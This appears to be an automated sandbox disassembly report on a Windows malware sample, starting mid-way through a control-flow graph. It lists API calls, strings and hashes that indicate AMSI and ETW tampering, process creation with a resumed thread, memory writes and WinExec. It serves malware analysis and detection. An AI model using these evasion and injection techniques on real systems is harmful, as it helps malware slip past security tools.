29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 * 16 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29d7b98 call 29d818c call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 ExitProcess 5464->5554 5553->5554 5564 29e8c8f-29e8f62 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29de540 call 29c480c call 29c494c call 29c46a4 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c7e18 5553->5564 5822 29e921a-29e941b call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c49a4 call 29d8bb0 5564->5822 5823 29e8f68-29e9215 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c4d8c * 2 call 29c4734 call 29ddacc 5564->5823 5674 29e7fcb-29e7fce 5572->5674 5675 29e7fd0-29e82f0 call 29c49a4 call 29ddc90 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29dcfa4 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 5572->5675 5573->5572 5674->5675 5991 29e8309-29e8aec call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 ResumeThread call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 CloseHandle call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d7ed4 call 29d87a0 * 6 CloseHandle call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 5675->5991 5992 29e82f2-29e8304 call 29d8584 5675->5992 5822->5554 5823->5822 5991->5464 5992->5991
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8824: LoadLibraryA.KERNEL32(00000000,00000000,029D890B), ref: 029D8858
                                                                                                                          • Part of subcall function 029D8824: FreeLibrary.KERNEL32(74B10000,00000000,02A21388,Function_000065D8,00000004,02A21398,02A21388,05F5E0FF,00000040,02A2139C,74B10000,00000000,00000000,00000000,00000000,029D890B), ref: 029D88EB
                                                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02B157DC,02B15820,OpenSession,02A2137C,029EAFD8,UacScan,02A2137C), ref: 029E7E39
                                                                                                                        • ResumeThread.KERNEL32(00000000,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,UacScan,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8), ref: 029E8483
                                                                                                                        • CloseHandle.KERNEL32(00000000,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,UacScan,02A2137C,029EAFD8,00000000,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C), ref: 029E8602
                                                                                                                          • Part of subcall function 029D87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000860,00000000,02A213A4,029DA3C7,ScanString,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,Initialize,02A213A4,029DA77C,UacScan), ref: 029D87B4
                                                                                                                          • Part of subcall function 029D87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029D87CE
                                                                                                                          • Part of subcall function 029D87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000860,00000000,02A213A4,029DA3C7,ScanString,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,Initialize), ref: 029D880A
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02A2137C,029EAFD8,UacInitialize,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,UacScan,02A2137C), ref: 029E89F4
                                                                                                                          • Part of subcall function 029C7E18: GetFileAttributesA.KERNEL32(00000000,?,029DF8CC,ScanString,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanString,02A2137C,029EAFD8,UacScan,02A2137C,029EAFD8,UacInitialize), ref: 029C7E23
                                                                                                                          • Part of subcall function 029DDACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,029DDB9E), ref: 029DDB0B
                                                                                                                          • Part of subcall function 029DDACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 029DDB45
                                                                                                                          • Part of subcall function 029DDACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 029DDB72
                                                                                                                          • Part of subcall function 029DDACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 029DDB7B
                                                                                                                          • Part of subcall function 029D818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,029D8216), ref: 029D81F8
                                                                                                                        • ExitProcess.KERNEL32(00000000,OpenSession,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,Initialize,02A2137C,029EAFD8,00000000,00000000,00000000,ScanString,02A2137C,029EAFD8), ref: 029EAA25
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$CloseFile$CreateFreeHandleLoadProcess$AddressAttributesCacheExitFlushInstructionProcResumeThreadUserWrite
                                                                                                                        • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                        • API String ID: 1548959583-1225450241
                                                                                                                        • Opcode ID: e9c6147bac92d140013558c532a39611a58c111fd8e81af0f56170f411755c4b
                                                                                                                        • Instruction ID: 4d0f91a7d84dc5b89e5bb28dbed960a1c5ea0470ce0854552994bdbaf3912576
                                                                                                                        • Opcode Fuzzy Hash: e9c6147bac92d140013558c532a39611a58c111fd8e81af0f56170f411755c4b
                                                                                                                        • Instruction Fuzzy Hash: D143C775B501288BDF15EB64CD90ADE73B6BFC9310F6054E9E00AA7254DA30EF868F52
                                                                                                                        Function 029C1724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 10411 29c1724-29c1736 10412 29c173c-29c174c 10411->10412 10413 29c1968-29c196d 10411->10413 10414 29c174e-29c175b 10412->10414 10415 29c17a4-29c17ad 10412->10415 10416 29c1a80-29c1a83 10413->10416 10417 29c1973-29c1984 10413->10417 10418 29c175d-29c176a 10414->10418 10419 29c1774-29c1780 10414->10419 10415->10414 10422 29c17af-29c17bb 10415->10422 10423 29c1a89-29c1a8b 10416->10423 10424 29c1684-29c16ad VirtualAlloc 10416->10424 10420 29c1938-29c1945 10417->10420 10421 29c1986-29c19a2 10417->10421 10425 29c176c-29c1770 10418->10425 10426 29c1794-29c17a1 10418->10426 10428 29c17f0-29c17f9 10419->10428 10429 29c1782-29c1790 10419->10429 10420->10421 10427 29c1947-29c195b Sleep 10420->10427 10432 29c19a4-29c19ac 10421->10432 10433 29c19b0-29c19bf 10421->10433 10422->10414 10434 29c17bd-29c17c9 10422->10434 10430 29c16df-29c16e5 10424->10430 10431 29c16af-29c16dc call 29c1644 10424->10431 10427->10421 10435 29c195d-29c1964 Sleep 10427->10435 10441 29c182c-29c1836 10428->10441 10442 29c17fb-29c1808 10428->10442 10431->10430 10437 29c1a0c-29c1a22 10432->10437 10438 29c19d8-29c19e0 10433->10438 10439 29c19c1-29c19d5 10433->10439 10434->10414 10440 29c17cb-29c17de Sleep 10434->10440 10435->10420 10444 29c1a3b-29c1a47 10437->10444 10445 29c1a24-29c1a32 10437->10445 10450 29c19fc-29c19fe call 29c15cc 10438->10450 10451 29c19e2-29c19fa 10438->10451 10439->10437 10440->10414 10449 29c17e4-29c17eb Sleep 10440->10449 10446 29c18a8-29c18b4 10441->10446 10447 29c1838-29c1863 10441->10447 10442->10441 10443 29c180a-29c181e Sleep 10442->10443 10443->10441 10453 29c1820-29c1827 Sleep 10443->10453 10457 29c1a68 10444->10457 10458 29c1a49-29c1a5c 10444->10458 10445->10444 10454 29c1a34 10445->10454 10459 29c18dc-29c18eb call 29c15cc 10446->10459 10460 29c18b6-29c18c8 10446->10460 10455 29c187c-29c188a 10447->10455 10456 29c1865-29c1873 10447->10456 10449->10415 10461 29c1a03-29c1a0b 10450->10461 10451->10461 10453->10442 10454->10444 10463 29c188c-29c18a6 call 29c1500 10455->10463 10464 29c18f8 10455->10464 10456->10455 10462 29c1875 10456->10462 10465 29c1a6d-29c1a7f 10457->10465 10458->10465 10466 29c1a5e-29c1a63 call 29c1500 10458->10466 10471 29c18fd-29c1936 10459->10471 10474 29c18ed-29c18f7 10459->10474 10467 29c18cc-29c18da 10460->10467 10468 29c18ca 10460->10468 10462->10455 10463->10471 10464->10471 10466->10465 10467->10471 10468->10467
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000,?,029C2000), ref: 029C17D0
                                                                                                                        • Sleep.KERNEL32(0000000A,00000000,?,029C2000), ref: 029C17E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: 74d6fb5c4ff575110aed137e9056688380cff6e557952c8febb5bf92250b4d06
                                                                                                                        • Instruction ID: 9dd147f591a483cd5f93136fbf69c8f4e7b7c89a9e194e82a671e8adfaf40165
                                                                                                                        • Opcode Fuzzy Hash: 74d6fb5c4ff575110aed137e9056688380cff6e557952c8febb5bf92250b4d06
                                                                                                                        • Instruction Fuzzy Hash: 82B15872A043518FE715CF28D580355BBE5FF85320F2886AED94D8B386DB70D462CB9A
                                                                                                                        Function 029D870C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(amsi), ref: 029D8715
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                          • Part of subcall function 029D7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D7D74
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 029D8774
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                        • String ID: DllGetClassObject$W$amsi
                                                                                                                        • API String ID: 941070894-2671292670
                                                                                                                        • Opcode ID: 280a03d43087c054a1c14264a12ea5bba67ea397f2b915eebc11d821c12717fa
                                                                                                                        • Instruction ID: 007ffce3675b1bead32e6714371ce53a61a2bb4803f038fea08d9089f3a590cb
                                                                                                                        • Opcode Fuzzy Hash: 280a03d43087c054a1c14264a12ea5bba67ea397f2b915eebc11d821c12717fa
                                                                                                                        • Instruction Fuzzy Hash: EAF0AF5010C381B9E201E6B48C45F8FBECD4BD2224F44CA4CF1E85A2D2D679D1059BA7
                                                                                                                        Function 029C1A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 10499 29c1a8c-29c1a9b 10500 29c1b6c-29c1b6f 10499->10500 10501 29c1aa1-29c1aa5 10499->10501 10502 29c1c5c-29c1c60 10500->10502 10503 29c1b75-29c1b7f 10500->10503 10504 29c1b08-29c1b11 10501->10504 10505 29c1aa7-29c1aae 10501->10505 10510 29c16e8-29c170b call 29c1644 VirtualFree 10502->10510 10511 29c1c66-29c1c6b 10502->10511 10506 29c1b3c-29c1b49 10503->10506 10507 29c1b81-29c1b8d 10503->10507 10504->10505 10512 29c1b13-29c1b27 Sleep 10504->10512 10508 29c1adc-29c1ade 10505->10508 10509 29c1ab0-29c1abb 10505->10509 10506->10507 10514 29c1b4b-29c1b5f Sleep 10506->10514 10515 29c1b8f-29c1b92 10507->10515 10516 29c1bc4-29c1bd2 10507->10516 10519 29c1ae0-29c1af1 10508->10519 10520 29c1af3 10508->10520 10517 29c1abd-29c1ac2 10509->10517 10518 29c1ac4-29c1ad9 10509->10518 10529 29c170d-29c1714 10510->10529 10530 29c1716 10510->10530 10512->10505 10513 29c1b2d-29c1b38 Sleep 10512->10513 10513->10504 10514->10507 10522 29c1b61-29c1b68 Sleep 10514->10522 10523 29c1b96-29c1b9a 10515->10523 10516->10523 10526 29c1bd4-29c1bd9 call 29c14c0 10516->10526 10519->10520 10524 29c1af6-29c1b03 10519->10524 10520->10524 10522->10506 10527 29c1bdc-29c1be9 10523->10527 10528 29c1b9c-29c1ba2 10523->10528 10524->10503 10526->10523 10527->10528 10533 29c1beb-29c1bf2 call 29c14c0 10527->10533 10535 29c1bf4-29c1bfe 10528->10535 10536 29c1ba4-29c1bc2 call 29c1500 10528->10536 10534 29c1719-29c1723 10529->10534 10530->10534 10533->10528 10538 29c1c2c-29c1c59 call 29c1560 10535->10538 10539 29c1c00-29c1c28 VirtualFree 10535->10539
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000,?), ref: 029C1B17
                                                                                                                        • Sleep.KERNEL32(0000000A,00000000,?), ref: 029C1B31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: d48d07380c30df3acfb0629906df6a29dfa0e1cc79cb690d5fd32e9f45920710
                                                                                                                        • Instruction ID: f18cbf7d2d2d670029dbcd6113e950913464e742bde4c05e239190ea33dda3fc
                                                                                                                        • Opcode Fuzzy Hash: d48d07380c30df3acfb0629906df6a29dfa0e1cc79cb690d5fd32e9f45920710
                                                                                                                        • Instruction Fuzzy Hash: 1551C3716413408FE715CF68CA84766BBD4AF85324F3885AED94CCB287EB70D446CB9A
                                                                                                                        Function 029DE2F6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 029DE436
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CheckConnectionInternet
                                                                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                        • API String ID: 3847983778-3852638603
                                                                                                                        • Opcode ID: f5f734f319c318ededb488c55b82c335ef7547122f1cbda3155cd992e363b6d9
                                                                                                                        • Instruction ID: 452e023f94df67480c6a49d4f6121fd8ed03443a6c91a90e7549d5063f65b484
                                                                                                                        • Opcode Fuzzy Hash: f5f734f319c318ededb488c55b82c335ef7547122f1cbda3155cd992e363b6d9
                                                                                                                        • Instruction Fuzzy Hash: 2D411D35B501189BEB00FBA4CD90E9EB3FAEFCC710F219429E085A7244DA74AD019F65
                                                                                                                        Function 029D840E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • WinExec.KERNEL32(?,?), ref: 029D8478
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
